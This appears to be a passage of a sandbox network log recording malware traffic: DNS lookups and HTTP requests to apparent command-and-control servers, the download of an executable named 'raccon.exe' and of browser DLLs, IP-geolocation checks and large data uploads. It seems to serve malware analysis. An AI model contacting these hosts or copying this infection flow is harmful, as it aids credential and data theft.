User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 142
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 152
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 366
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=3
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 275
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 74
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
GET

http://999080321test51-service10020125999080321.xyz/raccon.exe

Remote address:

45.139.187.152:80

Request

GET /raccon.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:23 GMT
Content-Type: application/x-msdos-program
Content-Length: 580096
Connection: keep-alive
Keep-Alive: timeout=3
Last-Modified: Wed, 05 May 2021 17:37:02 GMT
ETag: W/"8da00-5c198a47d76c1"
Accept-Ranges: bytes
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 167
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=3
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=3
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 273
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 150
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 200
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 342
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

mntbmDSWGvyeyvzEwSe.mntbmDSWGvyeyvzEwSe

Fessura.exe.com

Remote address:

8.8.8.8:53

Request

mntbmDSWGvyeyvzEwSe.mntbmDSWGvyeyvzEwSe

IN A

Response
DNS

myexternalip.com

19EE.exe

Remote address:

8.8.8.8:53

Request

myexternalip.com

IN A

Response

myexternalip.com

IN A

34.117.59.81
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

pki.goog

19EE.exe

Remote address:

8.8.8.8:53

Request

pki.goog

IN A

Response

pki.goog

IN A

216.239.32.29
GET

http://pki.goog/gsr1/gsr1.crt

19EE.exe

Remote address:

216.239.32.29:80

Request

GET /gsr1/gsr1.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/pkix-cert
Cross-Origin-Resource-Policy: same-site
Content-Length: 889
Date: Wed, 05 May 2021 17:22:16 GMT
Expires: Wed, 05 May 2021 18:22:16 GMT
Last-Modified: Wed, 20 May 2020 16:45:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Age: 881
Cache-Control: public, max-age=3600
DNS

freegeoip.live

19EE.exe

Remote address:

8.8.8.8:53

Request

freegeoip.live

IN A

Response

freegeoip.live

IN A

172.67.188.222

freegeoip.live

IN A

104.21.8.254
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=1270-2181
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:36:58 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 912
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:37:03 GMT
Content-Range: bytes 1270-2181/1433368
Content-Type: application/x-7z-compressed
Age: 0
GET

http://sunlabsinternational.com/data/data.7z

BITS

Remote address:

89.221.213.3:80

Request

GET /data/data.7z HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 05 May 2021 17:06:58 GMT
Range: bytes=2182-7179
User-Agent: Microsoft BITS/7.8
Host: sunlabsinternational.com

Response

HTTP/1.1 206 Partial Content

Date: Wed, 05 May 2021 17:37:12 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:06:58 GMT
ETag: "15df18-5c19838f65646"
Accept-Ranges: bytes
Content-Length: 4998
Cache-Control: max-age=5
Expires: Wed, 05 May 2021 17:37:17 GMT
Content-Range: bytes 2182-7179/1433368
Content-Type: application/x-7z-compressed
Age: 0
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

api.faceit.com

Remote address:

8.8.8.8:53

Request

api.faceit.com

IN A

Response

api.faceit.com

IN A

104.17.62.50

api.faceit.com

IN A

104.17.63.50
GET

https://api.faceit.com/core/v1/nicknames/sslamlssa

powershell.exe

Remote address:

104.17.62.50:443

Request

GET /core/v1/nicknames/sslamlssa HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Host: api.faceit.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:37:04 GMT
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d9935c73b4be25a0f72d1fb2e704831981620236224; expires=Fri, 04-Jun-21 17:37:04 GMT; path=/; domain=.faceit.com; HttpOnly; SameSite=Lax; Secure
access-control-allow-origin: *
access-control-allow-methods: GET,POST,DELETE,PUT,OPTIONS,PATCH
access-control-allow-headers: Accept,Content-Type,X-Requested-With,User-Id,Authorization,Anonymous-Id,faceit-auth,faceit-referer,UserID
cache-control: max-age=60
x-faceit-cache: true
x-faceit-gateway: true
x-envoy-upstream-service-time: 1
x-envoy-decorator-operation: api-gateway.team-platform.svc.cluster.local:80/*
Via: 1.1 google
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
CF-Cache-Status: DYNAMIC
cf-request-id: 09df33e05100004be3743c2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Set-Cookie: __cf_bm=2dcda63f45e7c2729db3caaa8b43604b4fe07644-1620236224-1800-AdrlyBDiqO48UlT3OUfsTIljMMVKbHtq+91JLG08KrAi6cvCBJA9q4i7tdeo36x5uh7opJBQfUmC83AWXAD4DtqSeGX5o3WwBTlenPLRY71w; path=/; expires=Wed, 05-May-21 18:07:04 GMT; domain=.faceit.com; HttpOnly; Secure; SameSite=None
Set-Cookie: __cfruid=eaf7a0de8abb1b0898f8916dd5d9f1240f4f5549-1620236224; path=/; domain=.faceit.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 64abbc13be514be3-AMS
POST

http://188.34.193.205/892

powershell.exe

Remote address:

188.34.193.205:80

Request

POST /892 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 188.34.193.205
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
GET

http://188.34.193.205/freebl3.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 334288
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "519d0-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:05 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://188.34.193.205/mozglue.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 137168
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "217d0-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:05 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://188.34.193.205/msvcp140.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 440120
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "6b738-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:05 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://188.34.193.205/nss3.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 1246160
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "1303d0-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:05 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://188.34.193.205/softokn3.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 144848
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "235d0-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:06 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://188.34.193.205/vcruntime140.dll

powershell.exe

Remote address:

188.34.193.205:80

Request

GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 188.34.193.205
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:06 GMT
Content-Type: application/x-msdos-program
Content-Length: 83784
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "14748-57aa1f0b0df80"
Expires: Thu, 06 May 2021 17:37:06 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes
POST

http://188.34.193.205/

powershell.exe

Remote address:

188.34.193.205:80

Request

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 83447
Host: 188.34.193.205
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

telete.in

Remote address:

8.8.8.8:53

Request

telete.in

IN A

Response

telete.in

IN A

195.201.225.248
GET

https://telete.in/jagressor_kz

3529.exe

Remote address:

195.201.225.248:443

Request

GET /jagressor_kz HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in

Response

HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 05 May 2021 17:37:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=b2df7eacd0026d3695_12404581101437342397; expires=Thu, 06 May 2021 17:37:09 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000
POST

http://35.228.62.50/

3529.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:10 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/6d8d6ab4569dddd3fc0cdafb18491894ff2d476c

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/6d8d6ab4569dddd3fc0cdafb18491894ff2d476c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:10 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:17 GMT
ETag: "60257d95-dfcff"
Accept-Ranges: bytes
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:37:12 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:37:12 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:37:13 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:37:13 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
GET

http://35.228.62.50//l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca

3529.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/JT6aPXkBuI_ccNKorezR/5bc0934687c28534ff2a0662b971995281a8e8ca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:37:13 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
POST

http://35.228.62.50/

3529.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 1247
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:37:14 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
POST

http://999080321test51-service10020125999080321.xyz/

explorer.exe

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 533
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:36:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 432
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
GET

https://tttttt.me/iolitena111

5229.exe

Remote address:

95.216.186.40:443

Request

GET /iolitena111 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me

Response

HTTP/1.1 200 OK

Server: nginx
